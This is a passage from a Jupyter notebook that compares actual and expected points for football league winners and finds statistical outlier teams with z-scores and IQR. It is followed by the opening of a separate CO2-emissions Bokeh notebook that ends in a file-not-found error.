Again, we cannot claim it's pure luck or pure skill, but a perfect combination of both in the right place at the right time."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Ligue_1')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## Serie A"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Serie_A']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Serie_A'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Serie_A'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in Serie A\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In the Italian Serie A Juventus has been dominating for 8 years in a row, although it cannot show any major success in the Champions League. I think by checking this chart and the numbers we can understand that Juve doesn't have strong enough competition inside the country and gets lots of \"lucky\" points, which again derive from multiple factors. We can see that Napoli outperformed Juventus by xPTS twice, but this is real life: in 2017, for example, Juve went crazy and scored an additional 26 goals (or created goals out of nowhere), while Napoli conceded 3 more than expected (due to a goalkeeper's error or maybe the excellence of some team in 1 or 2 particular matches). As with the situation in La Liga when Real Madrid became champion, I am sure we can find 1 or 2 games that were key that year.\n\nDetails matter in football. You see, one error here, one woodwork there and you've lost the title."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing to runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Serie_A')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## RFPL"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'RFPL']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'RFPL'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'RFPL'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n barmode='group',\n title=\"Comparing Actual and Expected Points for Winner Team in RFPL\",\n xaxis={'title': 'Year'},\n yaxis={'title': \"Points\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"I do not follow the Russian Premier League, so just by coldly looking at the data we see the same pattern of scoring more than you deserve, and also an interesting situation with CSKA Moscow from 2015 to 2017. During these years these guys were good, but they converted their advantage only once; in the other two seasons - if you do not convert, you get punished, or your main competitor simply converts better. \n\nThere is no justice in football :D. (As a side note on the code: the chart cell above is repeated for every league; a small helper is sketched below.) 
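The actual-vs-expected points chart is essentially copy-pasted for each league with only the league name changing; a helper along the following lines (a sketch assuming `go`, `py`, `first_place` and `years` exactly as defined earlier in this notebook) would remove that duplication:

```python
# Helper sketch: build the actual-vs-expected points chart for any league,
# mirroring the repeated per-league cells above.
def plot_winner_pts_vs_xpts(league_key, league_title):
    winner = first_place[first_place['league'] == league_key]
    data = [
        go.Bar(x=years, y=winner['pts'], name='PTS'),
        go.Bar(x=years, y=winner['xpts'], name='Expected PTS'),
    ]
    layout = go.Layout(
        barmode='group',
        title='Comparing Actual and Expected Points for Winner Team in ' + league_title,
        xaxis={'title': 'Year'},
        yaxis={'title': 'Points'},
    )
    py.iplot(go.Figure(data=data, layout=layout))

# Example: reproduce the Serie A figure with one call
plot_winner_pts_vs_xpts('Serie_A', 'Serie A')
```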
Although I believe that with VAR the numbers will become more stable in the next seasons, because one of the reasons for those additional goals and points is refereeing errors."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing to runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'RFPL')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Statistical Overview"},{"metadata":{},"cell_type":"markdown","source":"As there are 6 leagues with different teams and stats, I decided to focus on one league in the beginning to test different approaches and then replicate the final analysis on the other 5. And as I watch mostly La Liga, I will start with this competition as I know the most about it."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Creating a separate DataFrame for each league\nlaliga = df_xg[df_xg['league'] == 'La_liga']\nlaliga.reset_index(inplace=True)\nepl = df_xg[df_xg['league'] == 'EPL']\nepl.reset_index(inplace=True)\nbundesliga = df_xg[df_xg['league'] == 'Bundesliga']\nbundesliga.reset_index(inplace=True)\nseriea = df_xg[df_xg['league'] == 'Serie_A']\nseriea.reset_index(inplace=True)\nligue1 = df_xg[df_xg['league'] == 'Ligue_1']\nligue1.reset_index(inplace=True)\nrfpl = df_xg[df_xg['league'] == 'RFPL']\nrfpl.reset_index(inplace=True)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"laliga.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Using the output of the describe() method we can get some interesting insights about every league. Below is a function that helps to extract those insights. "},{"metadata":{"trusted":true},"cell_type":"code","source":"def print_records_antirecords(df):\n print('Presenting some records and antirecords: \\n')\n for col in df.describe().columns:\n if col not in ['index', 'year', 'position']:\n team_min = df['team'].loc[df[col] == df.describe().loc['min',col]].values[0]\n year_min = df['year'].loc[df[col] == df.describe().loc['min',col]].values[0]\n team_max = df['team'].loc[df[col] == df.describe().loc['max',col]].values[0]\n year_max = df['year'].loc[df[col] == df.describe().loc['max',col]].values[0]\n val_min = df.describe().loc['min',col]\n val_max = df.describe().loc['max',col]\n print('The lowest value of {0} had {1} in {2} and it is equal to {3:.2f}'.format(col.upper(), team_min, year_min, val_min))\n print('The highest value of {0} had {1} in {2} and it is equal to {3:.2f}'.format(col.upper(), team_max, year_max, val_max))\n print('='*100)\n \n# replace laliga with any league you want\nprint_records_antirecords(laliga)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2014], \n y = laliga['xG_diff'][laliga['year'] == 2014],\n name = '2014',\n mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2015], \n y = laliga['xG_diff'][laliga['year'] == 2015],\n name='2015',\n mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2016], \n y = laliga['xG_diff'][laliga['year'] == 2016],\n name='2016',\n mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2017], \n y = laliga['xG_diff'][laliga['year'] == 2017],\n name='2017',\n mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2018], \n 
y = laliga['xG_diff'][laliga['year'] == 2018],\n name='2018',\n mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n title=\"Comparing xG gap between positions\",\n xaxis={'title': 'Position'},\n yaxis={'title': \"xG difference\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2014], \n y = laliga['xGA_diff'][laliga['year'] == 2014],\n name = '2014',\n mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2015], \n y = laliga['xGA_diff'][laliga['year'] == 2015],\n name='2015',\n mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2016], \n y = laliga['xGA_diff'][laliga['year'] == 2016],\n name='2016',\n mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2017], \n y = laliga['xGA_diff'][laliga['year'] == 2017],\n name='2017',\n mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2018], \n y = laliga['xGA_diff'][laliga['year'] == 2018],\n name='2018',\n mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n title=\"Comparing xGA gap between positions\",\n xaxis={'title': 'Position'},\n yaxis={'title': \"xGA difference\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2014], \n y = laliga['xpts_diff'][laliga['year'] == 2014],\n name = '2014',\n mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2015], \n y = laliga['xpts_diff'][laliga['year'] == 2015],\n name='2015',\n mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2016], \n y = laliga['xpts_diff'][laliga['year'] == 2016],\n name='2016',\n mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2017], \n y = laliga['xpts_diff'][laliga['year'] == 2017],\n name='2017',\n mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n x = laliga['position'][laliga['year'] == 2018], \n y = laliga['xpts_diff'][laliga['year'] == 2018],\n name='2018',\n mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n title=\"Comparing xPTS gap between positions\",\n xaxis={'title': 'Position'},\n yaxis={'title': \"xPTS difference\",\n }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From the charts above we can clearly see that top teams score more, concede less and get more points than expected. That's why these teams are top teams. And it is the totally opposite situation with the outsiders. The teams from the middle play average (a quick way to quantify this is sketched below). 
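One quick way to put numbers on that pattern - a sketch assuming the `laliga` DataFrame created above - is to average the differences by final position:

```python
# Average over/under-performance by final league position in La Liga:
# negative xG_diff and xpts_diff near the top, positive near the bottom.
by_position = laliga.groupby('position')[['xG_diff', 'xGA_diff', 'xpts_diff']].mean().round(2)
print(by_position)
```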
Totally logical, no huge insights here."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Check mean differences\ndef get_diff_means(df): \n dm = df.groupby('year')[['xG_diff', 'xGA_diff', 'xpts_diff']].mean()\n \n return dm\n\nmeans = get_diff_means(laliga)\nmeans","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Check median differences\ndef get_diff_medians(df): \n dm = df.groupby('year')[['xG_diff', 'xGA_diff', 'xpts_diff']].median()\n \n return dm\n\nmedians = get_diff_medians(laliga)\nmedians","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Outliers Detection"},{"metadata":{},"cell_type":"markdown","source":"## Z-Score"},{"metadata":{},"cell_type":"markdown","source":"The z-score is the number of standard deviations a data point is from the mean. We can use it to find outliers in our dataset by assuming that a |z-score| > 3 marks an outlier."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Getting outliers for xG using zscore\nfrom scipy.stats import zscore\n# laliga[(np.abs(zscore(laliga[['xG_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xG_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# outliers for xGA\n# laliga[(np.abs(zscore(laliga[['xGA_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xGA_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Outliers for xPTS\n# laliga[(np.abs(zscore(laliga[['xpts_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xpts_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"12 outliers in total were detected with the z-score. Poor Osasuna in 2016 - almost 30 undeserved goals conceded.\n\nAs we can see from this data, being an outlier at the top does not by itself make you win the season. But if you miss your opportunities or concede goals where you shouldn't, and do that way too much - you deserve relegation. Losing and being average is much easier than winning."},{"metadata":{},"cell_type":"markdown","source":"## Interquartile Range (IQR)"},{"metadata":{},"cell_type":"markdown","source":"The IQR is the difference between the third quartile and the first quartile of a set of data. This is one way to describe the spread of a set of data. \n\nA commonly used rule says that a data point is an outlier if it is more than 1.5 ⋅ IQR above the third quartile or below the first quartile. 
Said differently, low outliers are below Q1 − 1.5 ⋅ IQR and high outliers are above Q3 + 1.5 ⋅ IQR.\n\nLet's check it out."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Trying a different method of outlier detection\ndf_xg.describe()","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Using the interquartile range method to identify outliers\n# xG_diff\niqr_xG = df_xg.describe().loc['75%','xG_diff'] - df_xg.describe().loc['25%','xG_diff']\nupper_xG = df_xg.describe().loc['75%','xG_diff'] + 1.5 * iqr_xG\nlower_xG = df_xg.describe().loc['25%','xG_diff'] - 1.5 * iqr_xG\n\nprint('IQR for xG_diff: {:.2f}'.format(iqr_xG))\nprint('Upper border for xG_diff: {:.2f}'.format(upper_xG))\nprint('Lower border for xG_diff: {:.2f}'.format(lower_xG))\n\noutliers_xG = df_xg[(df_xg['xG_diff'] > upper_xG) | (df_xg['xG_diff'] < lower_xG)]\nprint('='*50)\n\n# xGA_diff\niqr_xGA = df_xg.describe().loc['75%','xGA_diff'] - df_xg.describe().loc['25%','xGA_diff']\nupper_xGA = df_xg.describe().loc['75%','xGA_diff'] + 1.5 * iqr_xGA\nlower_xGA = df_xg.describe().loc['25%','xGA_diff'] - 1.5 * iqr_xGA\n\nprint('IQR for xGA_diff: {:.2f}'.format(iqr_xGA))\nprint('Upper border for xGA_diff: {:.2f}'.format(upper_xGA))\nprint('Lower border for xGA_diff: {:.2f}'.format(lower_xGA))\n\noutliers_xGA = df_xg[(df_xg['xGA_diff'] > upper_xGA) | (df_xg['xGA_diff'] < lower_xGA)]\nprint('='*50)\n\n# xpts_diff\niqr_xpts = df_xg.describe().loc['75%','xpts_diff'] - df_xg.describe().loc['25%','xpts_diff']\nupper_xpts = df_xg.describe().loc['75%','xpts_diff'] + 1.5 * iqr_xpts\nlower_xpts = df_xg.describe().loc['25%','xpts_diff'] - 1.5 * iqr_xpts\n\nprint('IQR for xPTS_diff: {:.2f}'.format(iqr_xpts))\nprint('Upper border for xPTS_diff: {:.2f}'.format(upper_xpts))\nprint('Lower border for xPTS_diff: {:.2f}'.format(lower_xpts))\n\noutliers_xpts = df_xg[(df_xg['xpts_diff'] > upper_xpts) | (df_xg['xpts_diff'] < lower_xpts)]\nprint('='*50)\n\noutliers_full = pd.concat([outliers_xG, outliers_xGA, outliers_xpts])\noutliers_full = outliers_full.drop_duplicates()","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Adding a reversed (bottom-up) rating to find the loser in each league (leagues have different numbers of teams, so I can't just use n-20)\nmax_position = df_xg.groupby('league')['position'].max()\ndf_xg['position_reverse'] = np.nan\noutliers_full['position_reverse'] = np.nan\n\nfor i, row in df_xg.iterrows():\n df_xg.at[i, 'position_reverse'] = np.abs(row['position'] - max_position[row['league']])+1\n \nfor i, row in outliers_full.iterrows():\n outliers_full.at[i, 'position_reverse'] = np.abs(row['position'] - max_position[row['league']])+1","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"total_count = df_xg[(df_xg['position'] <= 4) | (df_xg['position_reverse'] <= 3)].count()[0]\noutlier_count = outliers_full[(outliers_full['position'] <= 4) | (outliers_full['position_reverse'] <= 3)].count()[0]\noutlier_prob = outlier_count / total_count\nprint('Probability of outlier in top or bottom of the final table: {:.2%}'.format(outlier_prob))","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"So we can say that it is very probable that every year, in one of the 6 leagues, there will be a team that gets a ticket to the Champions League or Europa League with the help of luck on top of their great skill, or there will be a loser that goes down to the second division because they cannot convert their 
moments."},{"metadata":{"trusted":true},"cell_type":"code","source":"# 1-3 outliers among all leagues in a year\ndata = pd.DataFrame(outliers_full.groupby('league')['year'].count()).reset_index()\ndata = data.rename(index=int, columns={'year': 'outliers'})\nsns.barplot(x='league', y='outliers', data=data)\n# no outliers in Bundesliga","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Our winners and losers, with brilliant performance and brilliant underperformance:"},{"metadata":{"trusted":true},"cell_type":"code","source":"top_bottom = outliers_full[(outliers_full['position'] <= 4) | (outliers_full['position_reverse'] <= 3)].sort_values(by='league')\ntop_bottom","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Let's get back to our list of teams that suddenly got into the top. Was that because of an unbelievable mix of luck and skill?\not = [x for x in outlier_teams if x in top_bottom['team'].drop_duplicates().tolist()]\not\n# The answer is absolutely no. They just played well during 1 season. Sometimes that happens.","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Conclusions"},{"metadata":{},"cell_type":"markdown","source":"Football is a low-scoring game, and one goal can change the entire picture of the game and even the end result. That's why long-term analysis gives you a better picture of the situation. \n\nWith the introduction of the xG metric (and others that derive from it) we can now really evaluate the performance of a team over the long run and understand the difference between top teams, middle-class teams and absolute outsiders. \n\nxG brings new arguments into discussions around football, which makes it even more interesting. And at the same time the game doesn't lose its factor of uncertainty and the possibility of crazy things happening. Actually, now these crazy things have a chance to be explained.\n\nIn the end we have found that there is an almost 100% chance that something weird will happen in one of the leagues (a back-of-the-envelope version of that calculation is sketched below). 
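A rough sketch of that estimate, reusing `df_xg` and `outliers_full` from above and assuming (for simplicity) that the six leagues behave independently:

```python
# Share of league-seasons that produced at least one outlier team
n_league_seasons = df_xg.groupby(['league', 'year']).ngroups
n_with_outlier = outliers_full.groupby(['league', 'year']).ngroups
p_league_season = n_with_outlier / n_league_seasons

# Chance that at least one of the 6 tracked leagues produces an outlier in a given year
p_any_in_a_year = 1 - (1 - p_league_season) ** 6
print('Chance of at least one outlier league in a year: {:.1%}'.format(p_any_in_a_year))
```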
It is just question of time how epic that will be."}],"metadata":{"kernelspec":{"display_name":"Python 3","language":"python","name":"python3"},"language_info":{"name":"python","version":"3.6.4","mimetype":"text/x-python","codemirror_mode":{"name":"ipython","version":3},"pygments_lexer":"ipython3","nbconvert_exporter":"python","file_extension":".py"}},"nbformat":4,"nbformat_minor":1} -------------------------------------------------------------------------------- /co2-bokeh.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 2, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import pandas as pd\n", 10 | "\n", 11 | "from bokeh.io import output_file, show, curdoc\n", 12 | "from bokeh.plotting import figure\n", 13 | "from bokeh.models import HoverTool, ColumnDataSource, CategoricalColorMapper, Slider\n", 14 | "from bokeh.palettes import Spectral6\n", 15 | "from bokeh.layouts import widgetbox, row" 16 | ] 17 | }, 18 | { 19 | "cell_type": "code", 20 | "execution_count": 5, 21 | "metadata": {}, 22 | "outputs": [ 23 | { 24 | "ename": "FileNotFoundError", 25 | "evalue": "File b'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv' does not exist", 26 | "traceback": [ 27 | "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", 28 | "\u001b[1;31mFileNotFoundError\u001b[0m Traceback (most recent call last)", 29 | "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m()\u001b[0m\n\u001b[0;32m 1\u001b[0m \u001b[1;31m# Data cleaning and preparation\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[0mdata\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mread_csv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 3\u001b[0m \u001b[0mdata\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mhead\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 30 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36mparser_f\u001b[1;34m(filepath_or_buffer, sep, delimiter, header, names, index_col, usecols, squeeze, prefix, mangle_dupe_cols, dtype, engine, converters, true_values, false_values, skipinitialspace, skiprows, nrows, na_values, keep_default_na, na_filter, verbose, skip_blank_lines, parse_dates, infer_datetime_format, keep_date_col, date_parser, dayfirst, iterator, chunksize, compression, thousands, decimal, lineterminator, quotechar, quoting, escapechar, comment, encoding, dialect, tupleize_cols, error_bad_lines, warn_bad_lines, skipfooter, skip_footer, doublequote, delim_whitespace, as_recarray, compact_ints, use_unsigned, low_memory, buffer_lines, memory_map, float_precision)\u001b[0m\n\u001b[0;32m 653\u001b[0m skip_blank_lines=skip_blank_lines)\n\u001b[0;32m 654\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 655\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0m_read\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfilepath_or_buffer\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 656\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 657\u001b[0m \u001b[0mparser_f\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__name__\u001b[0m \u001b[1;33m=\u001b[0m 
\u001b[0mname\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 31 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m_read\u001b[1;34m(filepath_or_buffer, kwds)\u001b[0m\n\u001b[0;32m 403\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 404\u001b[0m \u001b[1;31m# Create the parser.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 405\u001b[1;33m \u001b[0mparser\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mTextFileReader\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfilepath_or_buffer\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 406\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 407\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mchunksize\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0miterator\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 32 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m__init__\u001b[1;34m(self, f, engine, **kwds)\u001b[0m\n\u001b[0;32m 762\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0moptions\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'has_index_names'\u001b[0m\u001b[1;33m]\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mkwds\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'has_index_names'\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 763\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 764\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_make_engine\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mengine\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 765\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 766\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 33 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m_make_engine\u001b[1;34m(self, engine)\u001b[0m\n\u001b[0;32m 983\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_make_engine\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mengine\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;34m'c'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 984\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mengine\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;34m'c'\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 985\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mCParserWrapper\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mf\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0moptions\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 986\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 987\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mengine\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;34m'python'\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 34 | "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m__init__\u001b[1;34m(self, src, **kwds)\u001b[0m\n\u001b[0;32m 1603\u001b[0m 
\u001b[0mkwds\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'allow_leading_cols'\u001b[0m\u001b[1;33m]\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mindex_col\u001b[0m \u001b[1;32mis\u001b[0m \u001b[1;32mnot\u001b[0m \u001b[1;32mFalse\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1604\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1605\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_reader\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mparsers\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mTextReader\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msrc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1606\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1607\u001b[0m \u001b[1;31m# XXX\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 35 | "\u001b[1;32mpandas/_libs/parsers.pyx\u001b[0m in \u001b[0;36mpandas._libs.parsers.TextReader.__cinit__ (pandas\\_libs\\parsers.c:4209)\u001b[1;34m()\u001b[0m\n", 36 | "\u001b[1;32mpandas/_libs/parsers.pyx\u001b[0m in \u001b[0;36mpandas._libs.parsers.TextReader._setup_parser_source (pandas\\_libs\\parsers.c:8873)\u001b[1;34m()\u001b[0m\n", 37 | "\u001b[1;31mFileNotFoundError\u001b[0m: File b'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv' does not exist" 38 | ], 39 | "output_type": "error" 40 | } 41 | ], 42 | "source": [ 43 | "# Data cleaning and preparation\n", 44 | "data = pd.read_csv('/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv')\n", 45 | "data.head()" 46 | ] 47 | }, 48 | { 49 | "cell_type": "code", 50 | "execution_count": 4, 51 | "metadata": {}, 52 | "outputs": [ 53 | { 54 | "data": { 55 | "text/html": [ 56 | "
